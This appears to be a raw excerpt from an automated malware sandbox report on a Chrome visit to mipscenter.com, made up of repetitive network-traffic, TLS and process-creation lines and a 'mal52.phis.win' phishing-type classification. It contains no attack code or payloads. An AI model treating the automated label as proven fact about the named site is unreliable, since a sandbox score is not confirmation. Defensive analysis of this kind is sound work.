Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.206.37.78:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.33.252.15:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.209.72.207:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.17:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.80.34:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.32.98:443 -> 192.168.2.17:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.17:49826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.0.77.2:443 -> 192.168.2.17:49825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.71.137.105:443 -> 192.168.2.17:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.111.154:443 -> 192.168.2.17:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.65.214:443 -> 192.168.2.17:49839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.0.77.2:443 -> 192.168.2.17:49844 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.111.155:443 -> 192.168.2.17:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.71.137.105:443 -> 192.168.2.17:49846 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.32.98:443 -> 192.168.2.17:49852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.176.198:443 -> 192.168.2.17:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.17:49857 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.64.118:443 -> 192.168.2.17:49862 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.17:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.142:443 -> 192.168.2.17:49866 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49877 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49878 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.201.191.59:443 -> 192.168.2.17:49880 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.201.191.59:443 -> 192.168.2.17:49879 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.32.98:443 -> 192.168.2.17:49886 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49891 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.238:443 -> 192.168.2.17:49892 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49890 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.206.37.78:443 -> 192.168.2.17:49895 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.206.37.78:443 -> 192.168.2.17:49904 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49908 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49934 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49958 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir3264_1967093553
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir3264_1967093553
Source: classification engineClassification label: mal52.phis.win@29/109@140/368
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mipscenter.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6436 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1876,i,2287647496574530764,16492952438617208269,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6436 /prefetch:8
